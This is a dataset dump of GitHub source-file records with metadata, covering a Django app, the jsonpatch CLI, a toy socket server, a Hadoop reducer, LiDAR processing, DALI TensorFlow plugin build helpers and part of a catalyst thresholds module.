| column | dtype | stats |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 2–616 |
| content_id | string | length 40 |
| detected_licenses | list | length 0–69 |
| license_type | string | 2 classes |
| repo_name | string | length 5–118 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | length 4–63 |
| visit_date | timestamp[us] | |
| revision_date | timestamp[us] | |
| committer_date | timestamp[us] | |
| github_id | int64 | 2.91k–686M, nullable |
| star_events_count | int64 | 0–209k |
| fork_events_count | int64 | 0–110k |
| gha_license_id | string | 23 classes, nullable |
| gha_event_created_at | timestamp[us] | |
| gha_created_at | timestamp[us] | |
| gha_language | string | 213 classes |
| src_encoding | string | 30 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 2–10.3M |
| extension | string | 246 classes |
| content | string | length 2–10.3M |
| authors | list | length 1 |
| author_id | string | length 0–212 |
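Each record below is one source file together with the metadata described above. As a minimal sketch (assuming the table was exported locally as Parquet; the file name records.parquet is hypothetical, and the `datasets` package is required), the records can be streamed and filtered like so:

from datasets import load_dataset

# Stream the records and keep only permissively licensed Python files.
rows = load_dataset("parquet", data_files="records.parquet", split="train", streaming=True)
for row in rows:
    if row["license_type"] == "permissive" and row["language"] == "Python":
        print(row["repo_name"], row["path"], row["length_bytes"])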
150bd0efd216bec9d3f05d67433ec1b07b6a88dc
|
edebce2da16b500683cb9777c37924bf3dcd2895
|
/myself/blog/blog/urls.py
|
77bd8a1bcc2b85d70290d5fed2334d1b66011e47
|
[] |
no_license
|
yxd2018/Test
|
d26778b0b826f663b665f765b0851b8f2d04a7f7
|
9fba56a9d7540ce35e29bf886248e05fc090c21d
|
refs/heads/master
| 2020-03-08T07:47:42.445969
| 2018-04-04T02:58:12
| 2018-04-04T02:58:12
| 128,003,604
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 940
|
py
|
"""blog URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.contrib import admin
from app01 import views
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'ckeditor', include('ckeditor_uploader.urls')),
url(r'^index$', views.index, name='index'),
url(r'^index2/(\d+)', views.index2, name='index2'),
]
|
[
"yxd0822@163.com"
] |
yxd0822@163.com
|
24826e7db681b08ab83bbbc5d2e7edf0c4dc493b
|
0604fb807a330892b82de2f13e43d1e288f33043
|
/tests/.venv/bin/jsonpatch
|
2e23b784b185a3e40e966bb637c392a564d0b346
|
[] |
no_license
|
wtsi-hgi/openstack_report
|
fe679c33d776ba5c181d5a0a806122d8fe89cc27
|
1e9fddaddf82bca6290a5d52792b7df608600804
|
refs/heads/master
| 2023-01-23T07:46:39.275387
| 2021-02-19T13:43:35
| 2021-02-19T13:43:35
| 203,331,160
| 0
| 0
| null | 2023-01-04T09:03:16
| 2019-08-20T08:15:37
|
Python
|
UTF-8
|
Python
| false
| false
| 3,696
|
#!/Users/pa11/Code/openstack_report/.venv/bin/python3
# -*- coding: utf-8 -*-
import sys
import os.path
import json
import jsonpatch
import tempfile
import argparse
parser = argparse.ArgumentParser(
description='Apply a JSON patch on a JSON file')
parser.add_argument('ORIGINAL', type=argparse.FileType('r'),
help='Original file')
parser.add_argument('PATCH', type=argparse.FileType('r'),
nargs='?', default=sys.stdin,
help='Patch file (read from stdin if omitted)')
parser.add_argument('--indent', type=int, default=None,
help='Indent output by n spaces')
parser.add_argument('-b', '--backup', action='store_true',
help='Back up ORIGINAL if modifying in-place')
parser.add_argument('-i', '--in-place', action='store_true',
help='Modify ORIGINAL in-place instead of to stdout')
parser.add_argument('-v', '--version', action='version',
version='%(prog)s ' + jsonpatch.__version__)
def main():
try:
patch_files()
except KeyboardInterrupt:
sys.exit(1)
def patch_files():
""" Diffs two JSON files and prints a patch """
args = parser.parse_args()
doc = json.load(args.ORIGINAL)
patch = json.load(args.PATCH)
result = jsonpatch.apply_patch(doc, patch)
if args.in_place:
dirname = os.path.abspath(os.path.dirname(args.ORIGINAL.name))
try:
# Attempt to replace the file atomically. We do this by
# creating a temporary file in the same directory as the
# original file so we can atomically move the new file over
# the original later. (This is done in the same directory
# because atomic renames do not work across mount points.)
fd, pathname = tempfile.mkstemp(dir=dirname)
fp = os.fdopen(fd, 'w')
atomic = True
except OSError:
# We failed to create the temporary file for an atomic
# replace, so fall back to non-atomic mode by backing up
# the original (if desired) and writing a new file.
if args.backup:
os.rename(args.ORIGINAL.name, args.ORIGINAL.name + '.orig')
fp = open(args.ORIGINAL.name, 'w')
atomic = False
else:
# Since we're not replacing the original file in-place, write
# the modified JSON to stdout instead.
fp = sys.stdout
# By this point we have some sort of file object we can write the
# modified JSON to.
json.dump(result, fp, indent=args.indent)
fp.write('\n')
if args.in_place:
# Close the new file. If we aren't replacing atomically, this
# is our last step, since everything else is already in place.
fp.close()
if atomic:
try:
# Complete the atomic replace by linking the original
# to a backup (if desired), fixing up the permissions
# on the temporary file, and moving it into place.
if args.backup:
os.link(args.ORIGINAL.name, args.ORIGINAL.name + '.orig')
os.chmod(pathname, os.stat(args.ORIGINAL.name).st_mode)
os.rename(pathname, args.ORIGINAL.name)
except OSError:
# In the event we could not actually do the atomic
# replace, unlink the original to move it out of the
# way and finally move the temporary file into place.
os.unlink(args.ORIGINAL.name)
os.rename(pathname, args.ORIGINAL.name)
if __name__ == "__main__":
main()
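# Hypothetical usage sketch (not part of the original script): the same
# operation through the jsonpatch library API that this script wraps.
#
#   >>> import jsonpatch
#   >>> doc = {'name': 'old'}
#   >>> patch = [{'op': 'replace', 'path': '/name', 'value': 'new'}]
#   >>> jsonpatch.apply_patch(doc, patch)
#   {'name': 'new'}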
|
[
"pa11@mib113623i.internal.sanger.ac.uk"
] |
pa11@mib113623i.internal.sanger.ac.uk
|
|
6299e9b31dc2732eb897d86e22688c2d2019c47e
|
216f59e44324d19b4978e221e548f4dc88a96de2
|
/Day41/01 手写socket server.py
|
b5c6751fb445f149158f3a3a4ff89e676c7c8de0
|
[] |
no_license
|
klandhu/Python-S14
|
b69f85d749e26adaf1edfadf8f690cce25776bab
|
6171be56cc01ebdb11dffc0049e43727771f10fd
|
refs/heads/master
| 2020-04-06T09:53:01.596595
| 2018-11-16T10:06:40
| 2018-11-16T10:06:40
| 157,357,879
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 307
|
py
|
import socket
sk = socket.socket()
sk.bind(('127.0.0.1',8080))
sk.listen(5)
while 1:
conn, addr = sk.accept()
data = conn.recv(9000)
print(data)
conn.send(b'HTTP/1.1 200 OK\r\n\r\n')
#conn.send(b'o98k')
with open("test.html","rb") as f:
conn.send(f.read())
conn.close()
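# Hypothetical client sketch (not part of the original file): exercising the
# server above once it is listening on 127.0.0.1:8080.
#
#   import socket
#   client = socket.socket()
#   client.connect(('127.0.0.1', 8080))
#   client.send(b'GET / HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n')
#   print(client.recv(65536))  # status line followed by the test.html body
#   client.close()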
|
[
"nan.hu@gometech.com.cn"
] |
nan.hu@gometech.com.cn
|
556a0be4744a9543cc7d75387a5797c1e97cdc25
|
d46558f344c9f20205ee3c9c3f4fc4c3450500c8
|
/project2/task2/Reducer2.py
|
a061d28250bea81f2dc4126f1fc9250f8c082b09
|
[] |
no_license
|
xiezhw3/bigDataProject
|
8d6545d0853dfbec4dbd47337337711d14fffc9a
|
57a1905f924fb86ed541161334ecf6696e755e57
|
refs/heads/master
| 2016-08-05T06:58:13.962850
| 2015-06-11T13:19:39
| 2015-06-11T13:19:39
| 37,263,916
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 416
|
py
|
#! /usr/bin/python
import sys, heapq
from operator import *
oldKey = None
tags = {}
for line in sys.stdin:
data_mapped = line.strip().split('\t')
if len(data_mapped) != 3:
continue
zero, tag, num = data_mapped
    if tag not in tags:
tags[tag] = 0
tags[tag] += int(num)
top100 = heapq.nlargest(100, tags, key = lambda x: (tags[x], x))
for item in top100:
print item
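# Hypothetical usage sketch (not part of the original reducer): it reads
# tab-separated lines "zero\ttag\tcount" from stdin (the mapper's output),
# sums the counts per tag, and prints the top tags, e.g. the input
#   0\tpython\t3
#   0\tpython\t2
#   0\thadoop\t1
# prints "python" then "hadoop".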
|
[
"xiezhw3@gmail.com"
] |
xiezhw3@gmail.com
|
c274dbbe37b4a409b549b682a826a50e9a4c7009
|
e74d43d46819068bb51724e3c3485796065af1f7
|
/strings_and_array/P1_2.py
|
c60d7c8c530f1fe0e33ebb9eb724e414e7484646
|
[] |
no_license
|
sunnyyants/crackingPython
|
30a06de78525773fdf6d18e55f20e9970d4031b5
|
6197e916dfd47be61319103c7d482d4bae0f8f93
|
refs/heads/master
| 2021-01-15T23:02:16.865043
| 2014-01-12T20:06:07
| 2014-01-12T20:06:07
| 13,941,490
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 498
|
py
|
__author__ = 'SunnyYan'
# Reverse a null-terminated string
# I decide to use 3 different methods
def method1(strings):
    # Recursive: reverse the tail, then append the head.
    if len(strings) <= 1:  # base case also covers the empty string
        return strings
    return method1(strings[1:]) + strings[0]
def method2(strings):
return strings[::-1]
def method3(strings):
i = len(strings)-1
result = []
while(i >= 0):
result.append(strings[i])
i -= 1
return ''.join(result)
print method1("abcdefg")
print method2("1234567")
print method3("leveleivia")
|
[
"sunnyyants@gmail.com"
] |
sunnyyants@gmail.com
|
84db0d6012e0ac0180354fa1f6e290665ac7f820
|
9407dc0d46e266bc76eb9572731e0e9924364f61
|
/vikalp/local_settings.py
|
74a2ab2a4fbf0a5bd37afe0d3f76aaa66e52d7e2
|
[] |
no_license
|
mihirk/vikalp
|
232aac510f98f05572d910645a070772a55a9051
|
bb29624f438ce2e9e0e8482f3fe645f7b5ae32e1
|
refs/heads/master
| 2021-01-18T03:37:39.050602
| 2014-01-03T13:46:46
| 2014-01-03T13:46:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 664
|
py
|
# DEBUG = True
from .settings import * # noqa
TEST_RUNNER = 'django.test.simple.DjangoTestSuiteRunner'
COMPRESS_ENABLED = True
DATABASES = {
"default": {
# Ends with "postgresql_psycopg2", "mysql", "sqlite3" or "oracle".
"ENGINE": "django.db.backends.sqlite3",
# DB name or path to database file if using sqlite3.
"NAME": "dev.db",
# Not used with sqlite3.
"USER": "",
# Not used with sqlite3.
"PASSWORD": "",
# Set to empty string for localhost. Not used with sqlite3.
"HOST": "",
# Set to empty string for default. Not used with sqlite3.
"PORT": "",
}
}
|
[
"mihir.khatwani@gmail.com"
] |
mihir.khatwani@gmail.com
|
49ad2bf24f87bb8e881b32002df4a56eb1cde4e1
|
719febb378f20e9c63aefd521ab6ceb1a05e836f
|
/runserver.py
|
64149946f28bb657ca2cdd6e3a13899d4a7af172
|
[] |
no_license
|
shuyangli/paradigms-game
|
303336daa3b6e4a4d99165158b45ccbfa14ce95f
|
22fa2d047facdcd65ec71f5f9c668c87afbaa419
|
refs/heads/master
| 2016-09-05T19:54:34.899171
| 2015-05-07T04:27:56
| 2015-05-07T04:27:56
| 34,142,667
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 511
|
py
|
import argparse
from castle_server import CastleServer
if __name__ == '__main__':
# Parse command line arguments
parser = argparse.ArgumentParser(description="Server for Castles game.")
parser.add_argument("-p", "--port", type=int, default=9001, dest="port", help="port number")
parser.add_argument("-d", "--debug", action="store_true", dest="debug", help="enable debug mode")
args = parser.parse_args()
# Run server
server = CastleServer(args.port, args.debug)
server.start()
|
[
"shuyang.li.95@gmail.com"
] |
shuyang.li.95@gmail.com
|
d4fddba0fc023aa2bf4ded9cd8bd5b50cf21c4d4
|
b8b6bd8f14db95d74df1f27e2c7e5e61d0e831e2
|
/src/DQN.py
|
470ebda84eea9e1b2e6f2c5636f8658203cdabfa
|
[] |
no_license
|
JustCallMeDavid/USRL4RS
|
fa6f2c83cb8e0e11381eba15deaeb5b21820b56d
|
ddaeb75f7a17ca484196a2e985b94e64cbed1c08
|
refs/heads/main
| 2023-08-27T15:08:29.317092
| 2021-10-11T13:55:58
| 2021-10-11T13:55:58
| 415,513,534
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 388
|
py
|
import torch
class DQNet(torch.nn.Module):
def __init__(self, emb_size, hidden_size, out_size):
super(DQNet, self).__init__()
self.fc1 = torch.nn.Linear(emb_size, hidden_size)
self.fc2 = torch.nn.Linear(hidden_size, out_size)
self.relu = torch.nn.ReLU()
def forward(self, x):
return self.relu(self.fc2(self.relu(self.fc1(x.squeeze()))))
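# Hypothetical usage sketch (not part of the original file): a single forward
# pass with assumed sizes emb_size=16, hidden_size=32, out_size=4.
if __name__ == '__main__':
    net = DQNet(emb_size=16, hidden_size=32, out_size=4)
    q_values = net(torch.randn(1, 16))  # squeezed to shape (16,) in forward()
    print(q_values.shape)               # torch.Size([4])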
|
[
"d.gradinariu@hotmail.com"
] |
d.gradinariu@hotmail.com
|
aaaad40aad30f39b1b13f1908e2db82289f5c51d
|
ee1b2303bc3d7d476f61bd5268baa707279fc454
|
/LAS_Processor_v4.py
|
ce96857739842a3c9c047b2a395204b6393cea41
|
[] |
no_license
|
GeospatialDaryl/objLAS
|
b90853fd6ff494eba39de72ed2284d9e0d3f34e3
|
a1f85266fdaf9031dcc4cf442fdd9512e51e7b82
|
refs/heads/master
| 2021-01-06T20:46:41.279218
| 2015-09-23T17:07:06
| 2015-09-23T17:07:06
| 31,977,875
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,101
|
py
|
import ClassLASObj_v13
from ClassLASObj_v13 import *
#Class LTKPaths contains Machine Specific Paths
import ModuleLiDARtools_v1
from ModuleLiDARtools_v1 import * #Paths
import os
#import arcpy
#import arcgisscripting
#gp = arcgisscripting.create(9.3)
#gp.AddToolbox("C:\Program Files (x86)\ArcGIS\ArcToolBox\Toolboxes\Conversion Tools.tbx")
#gp.overwriteoutput = 1
utmn83 = "PROJCS['NAD_1983_UTM_Zone_10N',GEOGCS['GCS_North_American_1983',DATUM['D_North_American_1983',SPHEROID['GRS_1980',6378137.0,298.257222101]],PRIMEM['Greenwich',0.0],UNIT['Degree',0.0174532925199433]],PROJECTION['Transverse_Mercator'],PARAMETER['False_Easting',500000.0],PARAMETER['False_Northing',0.0],PARAMETER['Central_Meridian',-123.0],PARAMETER['Scale_Factor',0.9996],PARAMETER['Latitude_Of_Origin',0.0],UNIT['Meter',1.0]]"
#instantiate Paths object
workPaths = Paths()
#create empty directory list of las files
listLASObj = []
# ##############ADJUST THE Target HERE ##########################
#thisOperationPath = workPaths.pathSctt
thisOperationPath = workPaths.pathShastaRepair
multiProcessor_Count = 8
# ###############################################################
workPaths.lasworkspace = thisOperationPath+"LAS\\pt2\\" #this needed toggling back from LAS_b 12/22/2011
workPaths.dtmworkspace = thisOperationPath+"DTM\\"
workPaths.chmworkspace = thisOperationPath+"CHM\\"
workPaths.lasExtent = thisOperationPath+"LAS\\"
workPaths.csvworkspace = thisOperationPath+"CSV\\"
workPaths.lasnorm = thisOperationPath+"LAS_norm\\"
workPaths.dem = thisOperationPath+"dem\\"
# ###############################################################
# Make a list of LAS in the directory of interest
dirList=os.listdir(workPaths.lasExtent) # USE the LAS not LAS_b to make this list
# ## Instantiate the list of LASObjs
for fname in dirList:
if "las" in fname:
nameLASObj = LASObj(workPaths.lasworkspace+fname,workPaths.lasExtent+fname)
print nameLASObj.las_name
listLASObj.append(nameLASObj)
del nameLASObj
countLASObj = 0
for LASObjs in listLASObj:
countLASObj = countLASObj + 1
print str(countLASObj)+" Total Tiles"
#Declare test LASObj object
test = listLASObj[0]
counter = 0
for LASObjs in listLASObj:
counter = counter + 1
print "Tile "+LASObjs.las_name+", "+str(counter)+" of "+str(countLASObj)
#LASObjs.makeCHM_StatePlaneFt(workPaths)
print "processing the tile . . ."
#LASObjs.makeCloudMetrics(workPaths)
#LASObjs.makeNormalizedLAS(workPaths,'C:\\Scratch\\ShastaRepair_LAS\\DEM\\Shasta_dem.img')
#LASObjs.makeNormalizedLAS_arcpy(workPaths,'C:\\Scratch\\ShastaRepair_LAS\\DEM\\Shasta_dem.img')
LASObjs.makeNormalizedLAS_arcpy(workPaths,"C:\\Scratch\\ShastaRepair_LAS\\tempRasWork\\repDEM.img")
#LASObjs.makeNormalizedLAS_pass(workPaths,'C:\\Scratch\\ShastaRepair_LAS\\tempRasWork\\repDEM.img')
#makeNormalizedLAS_MP(workPaths,8,"C:\\Scratch\\dem_be_1m.img")
#LASObjs.makeMetrics(workPaths)
#LASObjs.makeMetrics(workPaths,6.,["cover"])
#LASObjs.makeMetrics(workPaths,9.,["cover"])
|
[
"daryl_van_dyke@fws.gov"
] |
daryl_van_dyke@fws.gov
|
afb08de55adda6d146170c5964c70216e97605d2
|
14b44146a4d6b9780390a0dccbaed60156abb0f8
|
/blog/models.py
|
4d83b10414cb41f53fb11bd47c962f4b08b1b9a5
|
[] |
no_license
|
lillian7/wopaproject
|
8e15869cc8c42b2a89c8a809d0f805fab0814efa
|
68cde33a1539d7051a3c377e0404938a2c77fd5f
|
refs/heads/master
| 2020-05-17T21:38:03.503813
| 2014-08-08T08:18:22
| 2014-08-08T08:18:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,128
|
py
|
from django.db import models
from django.db.models import permalink
# Create your models here.
#first a database table called blog
class Blog(models.Model):
#the fields to be created in the table blogs
title = models.CharField(max_length=100, db_index=True)
slug = models.SlugField(max_length=100, db_index=True)
body = models.TextField()
posted = models.DateTimeField(db_index =True, auto_now_add =True)
category = models.ForeignKey('blog.Category')
#unicode will set the text reference 'title' for each record
def __unicode__(self):
return '%s' % self.title
@permalink
#decorator to hold the right url format
def get_absolute_url(self):
return ('view_blog_post', None, {'slug': self.slug})
#another database table called category
class Category(models.Model):
title = models.CharField(max_length = 100, db_index = True)
slug = models.SlugField(max_length = 100, db_index = True)
def __unicode__(self):
return '%s' % self.title
@permalink
def get_absolute_url(self):
return ('view_blog_category', None, {'slug': self.slug})
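# Hypothetical usage sketch (not part of the original file): creating a post
# from the Django shell, assuming migrations for these models have been run.
#
#   >>> cat = Category.objects.create(title='News', slug='news')
#   >>> Blog.objects.create(title='Hello', slug='hello', body='...', category=cat)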
|
[
"lnassanga@gmail.com"
] |
lnassanga@gmail.com
|
cab89a174139d9965e8c64cdb0a66f9260beeedf
|
4b758ca583d2a58d4d711381405e024109a0f08f
|
/dali_tf_plugin/dali_tf_plugin_utils.py
|
54baaa57acf8c189bf3870be8426eaa03913c41c
|
[
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
ConnectionMaster/DALI
|
76ff07b2fa3f62490b059088c88ade7570130ff4
|
6b90519d2c209d705e8912a5f00b71a018aeaa52
|
refs/heads/master
| 2023-04-14T13:04:57.520421
| 2021-01-22T16:34:31
| 2021-01-22T16:34:31
| 187,683,855
| 1
| 1
|
Apache-2.0
| 2023-04-03T23:45:28
| 2019-05-20T17:18:56
|
C++
|
UTF-8
|
Python
| false
| false
| 5,971
|
py
|
# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import subprocess
import os
import re
import sys
import platform
import fnmatch
from distutils.version import StrictVersion
# Find file matching `pattern` in `path`
def find(pattern, path):
result = []
for root, dirs, files in os.walk(path):
for name in files:
if fnmatch.fnmatch(name, pattern):
result.append(os.path.join(root, name))
return result
# Get path to python module `module_name`
def get_module_path(module_name):
module_path = ''
for d in sys.path:
possible_path = os.path.join(d, module_name)
# skip current dir as this is plugin dir
if os.path.isdir(possible_path) and len(d) != 0:
module_path = possible_path
break
return module_path
# Get compiler version used to build tensorflow
def get_tf_compiler_version():
tensorflow_libs = find('libtensorflow_framework*so*', get_module_path('tensorflow'))
if not tensorflow_libs:
tensorflow_libs = find('libtensorflow_framework*so*', get_module_path('tensorflow_core'))
if not tensorflow_libs:
return ''
lib = tensorflow_libs[0]
cmd = 'strings -a ' + lib + ' | grep "GCC: ("'
s = str(subprocess.check_output(cmd, shell=True))
lines = s.split('\\n')
ret_ver = ''
for line in lines:
res = re.search("GCC:\s*\(.*\)\s*(\d+.\d+).\d+", line)
if res:
ver = res.group(1)
if not ret_ver or StrictVersion(ret_ver) < StrictVersion(ver):
ret_ver = ver
return ret_ver
# Get current tensorflow version
def get_tf_version():
try:
import pkg_resources
s = pkg_resources.get_distribution("tensorflow-gpu").version
except:
# pkg_resources.get_distribution doesn't work well with conda installed packages
try:
import tensorflow as tf
s = tf.__version__
except:
return ""
version = re.search("(\d+.\d+).\d+", s).group(1)
return version
# Get C++ compiler
def get_cpp_compiler():
return os.environ.get('CXX') or 'g++'
# Get C++ compiler version
def get_cpp_compiler_version():
cmd = get_cpp_compiler() + ' --version | head -1 | grep "[c|g]++ ("'
s = str(subprocess.check_output(cmd, shell=True).strip())
version = re.search("[g|c]\+\+\s*\(.*\)\s*(\d+.\d+).\d+", s).group(1)
return version
# Runs `which` program
def which(program):
try:
return subprocess.check_output('which ' + program, shell=True).strip()
except:
return None
# Checks whether we are inside a conda env
def is_conda_env():
return True if os.environ.get('CONDA_PREFIX') else False
# Get compile and link flags for installed tensorflow
def get_tf_build_flags():
tf_cflags = ''
tf_lflags = ''
try:
import tensorflow as tensorflow
tf_cflags=" ".join(tensorflow.sysconfig.get_compile_flags())
tf_lflags=" ".join(tensorflow.sysconfig.get_link_flags())
except:
tensorflow_path = get_module_path('tensorflow')
if tensorflow_path != '':
tf_cflags=" ".join(["-I" + tensorflow_path + "/include", "-I" + tensorflow_path + "/include/external/nsync/public", "-D_GLIBCXX_USE_CXX11_ABI=0"])
tf_lflags=" ".join(["-L" + tensorflow_path, "-ltensorflow_framework"])
if tf_cflags == '' and tf_lflags == '':
raise ImportError('Could not find Tensorflow. Tensorflow must be installed before installing NVIDIA DALI TF plugin')
return (tf_cflags, tf_lflags)
# Get compile and link flags for installed DALI
def get_dali_build_flags():
dali_cflags = ''
dali_lflags = ''
try:
import nvidia.dali.sysconfig as dali_sc
dali_lib_path = dali_sc.get_lib_dir()
# We are linking with DALI's C library, so we don't need the C++ compile flags
# including the CXX11_ABI setting
dali_cflags=" ".join(dali_sc.get_include_flags())
dali_lflags=" ".join(dali_sc.get_link_flags())
except:
dali_path = get_module_path('nvidia/dali')
if dali_path != '':
dali_cflags=" ".join(["-I" + dali_path + "/include"])
dali_lflags=" ".join(["-L" + dali_path, "-ldali"])
if dali_cflags == '' and dali_lflags == '':
raise ImportError('Could not find DALI.')
return (dali_cflags, dali_lflags)
# Get compile and link flags for installed CUDA
def get_cuda_build_flags():
cuda_cflags = ''
cuda_lflags = ''
cuda_home = os.environ.get('CUDA_HOME')
if not cuda_home:
cuda_home = '/usr/local/cuda'
cuda_cflags=" ".join(["-I" + cuda_home + "/include"])
cuda_lflags=" ".join([])
return (cuda_cflags, cuda_lflags)
def find_available_prebuilt_tf(requested_version, available_libs):
req_ver_first, req_ver_second = [int(v) for v in requested_version.split('.', 2)]
selected_ver = None
for file in available_libs:
re_match = re.search(".*(\d+)_(\d+).*", file)
if re_match is None:
continue
ver_first, ver_second = [int(v) for v in re_match.groups()]
if ver_first == req_ver_first:
if ver_second <= req_ver_second and (selected_ver is None or selected_ver < (ver_first, ver_second)):
selected_ver = (ver_first, ver_second)
return '.'.join([str(v) for v in selected_ver]) if selected_ver is not None else None
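# Hypothetical usage sketch (not part of the original module): probing the
# local toolchain; the TF query raises ImportError if TensorFlow is absent.
if __name__ == '__main__':
    print(get_cpp_compiler(), get_cpp_compiler_version())
    print(get_cuda_build_flags())
    print(get_tf_build_flags())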
|
[
"noreply@github.com"
] |
ConnectionMaster.noreply@github.com
|
6820ae5641d1fe67e470fc362c090c11417e87bb
|
90343974013351bd925a403739ba77c45084fd7d
|
/Frankot_Chellapa.py
|
0a9466cfce0946f53869687dc2dae5e4ea7c96d6
|
[] |
no_license
|
cosecdelta/Computer-Vision-Basic-Codes
|
a91564855d0faa283129f5d4753d3a2434379891
|
bf95f1d25e4fdf9875701bb975355fd5c327e8cd
|
refs/heads/main
| 2023-03-05T00:21:14.845060
| 2021-02-17T22:19:29
| 2021-02-17T22:19:29
| 329,207,073
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,172
|
py
|
## Default modules imported. Import more if you need to.
import numpy as np
from skimage.io import imread, imsave
## Fill out these functions yourself
# Inputs:
# nrm: HxWx3. Unit normal vectors at each location. All zeros at mask == 0
# mask: A 0-1 mask of size HxW, showing where observed data is 'valid'.
# lmda: Scalar value of lambda to be used for regularizer weight as in slides.
#
# Returns depth map Z of size HxW.
#
# Be careful about division by 0.
#
# Implement in Fourier Domain / Frankot-Chellappa
def kernpad(K,size):
kernel_size = np.array(K.shape)
image_size = np.array(size)
pad_length = image_size - kernel_size
center_pixel = (kernel_size-1)//2
padded_img = np.pad(K,((0,pad_length[0]),(0,pad_length[1])))
circular_rotate_kernel = np.roll(padded_img, -int(center_pixel[0]), axis=0) #Rotating along the rows
    circular_rotate_kernel = np.roll(circular_rotate_kernel, -int(center_pixel[1]), axis=1) #Rotating along the columns
return circular_rotate_kernel
def ntod(nrm, mask, lmda):
nrm_flat = np.reshape(nrm,(-1,3))
mask_flat = np.broadcast_to(np.reshape(mask,(-1,1)),nrm_flat.shape)
nrm_flat = nrm_flat*mask_flat
nrm_flat = np.reshape(nrm_flat,nrm.shape)
gx = -np.divide(nrm_flat[:,:,0],nrm_flat[:,:,2])
    gy = -np.divide(nrm_flat[:,:,1],nrm_flat[:,:,2])  # y-gradient from the normal's y component
gx[np.isnan(gx)] = 0
gy[np.isnan(gy)] = 0
gu = np.fft.fft2(gx)
gv = np.fft.fft2(gy)
fx = np.reshape(np.array([0.5,0,-0.5]),(1,3))
fy = -np.transpose(fx)
fu = np.fft.fft2(kernpad(fx, gu.shape))
fv = np.fft.fft2(kernpad(fy, gv.shape))
fr = np.array([[-1/9,-1/9,-1/9],[-1/9,8/9,-1/9],[-1/9,-1/9,-1/9]])
fr_uv = np.fft.fft2(kernpad(fr, gu.shape))
fz_final = (np.conj(fu)*gu + np.conj(fv)*gv)/(np.square(abs(fu)) + np.square(abs(fv)) + lmda*np.square(abs(fr_uv)))
final_depth = np.real(np.fft.ifft2(fz_final))
return final_depth
########################## Support code below
from os.path import normpath as fn # Fixes window/linux path conventions
import warnings
warnings.filterwarnings('ignore')
import matplotlib.pyplot as plt
from matplotlib import cm
from mpl_toolkits.mplot3d import Axes3D
#### Main function
#nrm = imread(fn('inputs/phstereo/true_normals.png'))
# Un-comment next line to read your output instead
nrm = imread(fn('outputs/prob3_nrm.png'))
mask = np.float32(imread(fn('inputs/phstereo/mask.png')) > 0)
nrm = np.float32(nrm/255.0)
nrm = nrm*2.0-1.0
nrm = nrm * mask[:,:,np.newaxis]
# Main Call
Z = ntod(nrm,mask,1e-6)
# Plot 3D shape
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
x,y = np.meshgrid(np.float32(range(nrm.shape[1])),np.float32(range(nrm.shape[0])))
x = x - np.mean(x[:])
y = y - np.mean(y[:])
Zmsk = Z.copy()
Zmsk[mask == 0] = np.nan
Zmsk = Zmsk - np.nanmedian(Zmsk[:])
lim = 100
ax.plot_surface(x,-y,Zmsk, \
linewidth=0,cmap=cm.inferno,shade=True,\
vmin=-lim,vmax=lim)
ax.set_xlim3d(-450,450)
ax.set_ylim3d(-450,450)
ax.set_zlim3d(-450,450)
plt.show()
|
[
"noreply@github.com"
] |
cosecdelta.noreply@github.com
|
140539ee859d3d8844b1506b84e1853570ab09c1
|
246729c419e99e237065635f693f44fb0a62b41f
|
/catalyst/contrib/utils/thresholds.py
|
907e853b6514c5a2d8057a66a557ccade60e34b4
|
[
"Apache-2.0"
] |
permissive
|
Pandinosaurus/catalyst
|
d3fb311c26ec943b4ac483ba229c3dd1e7a7cff6
|
117b0cc9256be7af6122f6fcc4f95a0e5a2adbc5
|
refs/heads/master
| 2022-05-06T02:38:28.119220
| 2021-08-30T07:55:33
| 2021-08-30T07:55:33
| 207,519,426
| 0
| 0
|
Apache-2.0
| 2021-08-31T03:49:16
| 2019-09-10T09:35:11
|
Python
|
UTF-8
|
Python
| false
| false
| 16,883
|
py
|
from typing import Callable, List, Tuple
from collections import defaultdict
import enum
from functools import partial
import numpy as np
from sklearn.model_selection import RepeatedStratifiedKFold
METRIC_FN = Callable[[np.ndarray, np.ndarray], float]
class ThresholdMode(str, enum.Enum):
"""Available threshold search strategies types."""
NOOP = noop = "noop" # noqa: WPS115
MULTILABEL = multilabel = "multilabel" # noqa: WPS115
MULTICLASS = multiclass = "multiclass" # noqa: WPS115
def get_baseline_thresholds(
scores: np.ndarray, labels: np.ndarray, objective: METRIC_FN,
) -> Tuple[float, List[float]]:
"""Returns baseline thresholds for multiclass/multilabel classification.
Args:
